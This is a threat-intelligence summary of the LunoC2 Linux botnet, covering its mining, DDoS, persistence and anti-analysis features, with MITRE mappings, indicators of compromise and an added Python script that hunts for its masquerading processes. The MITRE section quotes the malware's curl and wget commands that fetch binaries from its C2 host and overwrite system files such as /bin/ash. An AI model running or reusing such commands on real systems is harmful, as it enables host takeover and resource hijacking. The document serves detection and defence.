Cyble CRIL identified the Luno Linux botnet (LunoC2), a modular, actively evolving framework that combines crypto-mining (xmrig) and dozens of tunable DDoS attack methods with persistence, self-update, and strong anti-analysis features. Key infrastructure and artifacts include domains main.botnet[.]world, botnet[.]world, fallback IP 111[.]0.0.2, and a hardcoded Monero wallet 4B9gxLDjJP2ZNHm8R6k3hUTT9ozmArqUggecuyDntnWKYS9h3HLJAzs8TV2YP8P7VkMshJxtPnJJ5iZRQmncKWyVAwadHH2. #LunoC2 #main.botnet.world
Key points
- LunoC2 is a modular Linux botnet combining cryptomining (xmrig) and DDoS-as-a-service capabilities with active development and frequent module updates.
- The malware implements watchdog-based respawning, signal resistance, and process masquerading (e.g., renaming to bash or kworker) to ensure persistence and evade termination.
- It replaces system binaries (e.g., /bin/ash, /usr/bin/*) and uses polymorphic mkstemp-based self-update to maintain unique filenames and remove traces.
- The malware's self-protection includes scanning /proc/net/* to guard its own socket and terminating unauthorized processes, while maintaining a large whitelist of allowed processes and IPs (including Cloudflare and Google IPs).
- Anti-analysis techniques detect debuggers/tracers, common analysis tools, anomalous NICs, and timing delays, and will attempt self-deletion if analysis is suspected.
- DDoS modules provide dozens of attack types (layer 3/4 floods, HTTP/Layer7 floods, game-specific attacks for Roblox/Minecraft/Valorant, raknet-based floods) with tunable parameters for target, method, duration, and threads.
- Key IOCs: multiple SHA256 hashes for botnet agents and updates, C2 domains main.botnet[.]world / botnet[.]world / backup1.botnet[.]world, fallback IP 111[.]0.0.2, and miner pool pool.supportxmr[.]com with a hardcoded Monero wallet.
MITRE Techniques
- [T1059.004] Command and Scripting Interpreter - Uses utilities like wget/curl to download and execute binaries from the C2 ("curl -sLo /bin/ash https://main[.]botnet[.]world/xmrig")
- [T1554] Compromise Host Software Binary - Ensures persistence by replacing software binaries (issues an HTTP GET to download "ss" and replaces system binaries in /usr/bin/)
- [T1036.004] Masquerading - Renames processes to mimic legitimate system processes and modifies /proc/<pid>/comm and /proc/<pid>/status to disguise itself as "bash"
- [T1497.003] Virtualization/Sandbox Evasion - Implements anti-analysis techniques to evade detection (debugger/tracer checks, tool detection, NIC interface checks, timing checks) and self-deletes on anomalies
- [T1071] Application Layer Protocol - Uses HTTP for C2 communication (the command handler receives commands from the resolved botnet[.]world)
- [T1105] Ingress Tool Transfer - Downloads additional tools such as the "ss" binary and the xmrig miner from main.botnet[.]world ("wget -qO /tmp/.sh_updXXXXXX")
- [T1496.001] Resource Hijacking - Uses infected systems to mine cryptocurrency via xmrig (launches "ash" with cpu-max-threads-hint and connects to pool.supportxmr[.]com:3333)
- [T1498] Network Denial of Service - Conducts denial-of-service attacks using dozens of DDoS methods (udp-flood, syn-flood, game-specific modules like game-roblox and mc-fakejoin)
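The persistence and masquerading behaviours above (comm rewritten to "bash" or "kworker", xmrig launched as "ash" against pool.supportxmr[.]com, and the polymorphic /tmp/.sh_updXXXXXX update file) can each be turned into a host-side hunt rule. The script below is an added example written for this summary; it is not Cyble's tooling or the botnet's code. The Proc record, the SAMPLE_PROCS entries and the --live switch are constructed for illustration; the only assumption beyond the page is that mkstemp() fills the XXXXXX template with six characters from [A-Za-z0-9], which is glibc's documented behaviour.

```python
"""Hunt helpers for LunoC2-style process masquerading (added example, not from the report)."""
import os
import re
from dataclasses import dataclass
from typing import Optional

# Indicators taken from the report: names the malware adopts, strings from its
# miner launch / C2, and the polymorphic self-update filename.
SUSPICIOUS_STRINGS = ("pool.supportxmr.com", "cpu-max-threads-hint", "botnet.world")
# Assumption: mkstemp() replaces XXXXXX with six characters from [A-Za-z0-9].
UPDATE_PATH_RE = re.compile(r"^/tmp/\.sh_upd[A-Za-z0-9]{6}$")


@dataclass
class Proc:
    pid: int
    comm: str                 # /proc/<pid>/comm, the name LunoC2 rewrites
    exe: Optional[str]        # readlink of /proc/<pid>/exe; None for kernel threads
    cmdline: str              # /proc/<pid>/cmdline with NULs replaced by spaces


def is_masquerading(p: Proc) -> bool:
    """comm claims to be bash/kworker but the backing executable disagrees."""
    if p.comm.startswith("kworker"):
        # Genuine kworkers are kernel threads and have no /proc/<pid>/exe at all.
        return p.exe is not None
    if p.comm == "bash":
        return p.exe is not None and os.path.basename(p.exe) != "bash"
    return False


def has_suspicious_cmdline(p: Proc) -> bool:
    """Miner pool, C2 domain or the xmrig thread-hint flag on the command line."""
    line = p.cmdline.lower()
    return any(s in line for s in SUSPICIOUS_STRINGS)


def is_update_artifact(path: str) -> bool:
    """True for the mkstemp-generated /tmp/.sh_updXXXXXX update filename."""
    return bool(UPDATE_PATH_RE.match(path))


def triage(procs):
    """Return {pid: [reasons]} for every process that trips at least one rule."""
    findings = {}
    for p in procs:
        reasons = []
        if is_masquerading(p):
            reasons.append(f"comm '{p.comm}' does not match exe {p.exe!r}")
        if has_suspicious_cmdline(p):
            reasons.append("cmdline references miner pool / C2 domain / xmrig flag")
        exe = (p.exe or "").replace(" (deleted)", "")   # self-update unlinks its file
        if exe and is_update_artifact(exe):
            reasons.append("running from polymorphic /tmp/.sh_updXXXXXX path")
        if reasons:
            findings[p.pid] = reasons
    return findings


def collect_procs(proc_root="/proc"):
    """Read live process records; entries that vanish mid-scan are skipped."""
    procs = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(os.path.join(base, "exe"))
            except OSError:
                exe = None        # kernel thread, or no permission to read the link
            procs.append(Proc(int(entry), comm, exe, cmdline))
        except OSError:
            continue
    return procs


# Constructed sample records; not captured from a real infection.
SAMPLE_PROCS = [
    Proc(1, "systemd", "/usr/lib/systemd/systemd", "/sbin/init"),
    Proc(42, "kworker/0:1", None, ""),                              # real kernel thread
    Proc(1337, "kworker/u8:2", "/tmp/.sh_updA9xQ3z", "./.sh_updA9xQ3z"),
    Proc(2048, "bash", "/bin/ash", "ash --cpu-max-threads-hint=75 -o pool.supportxmr.com:3333"),
    Proc(3000, "bash", "/usr/bin/bash", "bash -l"),
]

if __name__ == "__main__":
    import json
    import sys
    live = "--live" in sys.argv and sys.platform.startswith("linux")
    print(json.dumps(triage(collect_procs() if live else SAMPLE_PROCS), indent=2))
```

Run with --live on a Linux host (as root, so /proc/<pid>/exe is readable for every process) to triage the real process table; without it the constructed sample is used. The kworker rule is the most reliable of the three, since a user-space process can never legitimately be a kernel thread; the cmdline rule will also fire on a deliberately installed xmrig, so treat it as a lead rather than a verdict.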
Indicators of Compromise
- [Domain] C2 and hosting - main.botnet[.]world, botnet[.]world (hosts xmrig and C2 functionality)
- [IP] C2/fallback IPs - 111[.]0.0.2 (DNS fallback), 162[.]247.155[.]210 (observed C2 IP)
- [Wallet ID] Mining wallet - Monero wallet 4B9gxLDjJP2ZNHm8R6k3hUTT9ozmArqUggecuyDntnWKYS9h3HLJAzs8TV2YP8P7VkMshJxtPnJJ5iZRQmncKWyVAwadHH2 (hardcoded miner wallet)
- [Domain] Miner pool - pool.supportxmr[.]com (configured mining pool used by xmrig)
- [URL] Update endpoints - hxxp://backup1[.]botnet[.]world/x86_64 (used for .update downloads)
- [File/Path] Replaced binaries and downloaded filenames - /bin/ash (xmrig saved as ash), /tmp/.sh_updXXXXXX (temporary polymorphic update filename)
- [Hashes] Malware binaries - example SHA256: 02228a0bb896ba1c7d9ba55e30e2283ed0813828710a59b44ee5cd9ca15fde8d (botnet agent); the full report lists 40+ further SHA256 values for agents and updates
Read more: https://cyble.com/blog/lunobotnet-a-self-healing-linux-botnet/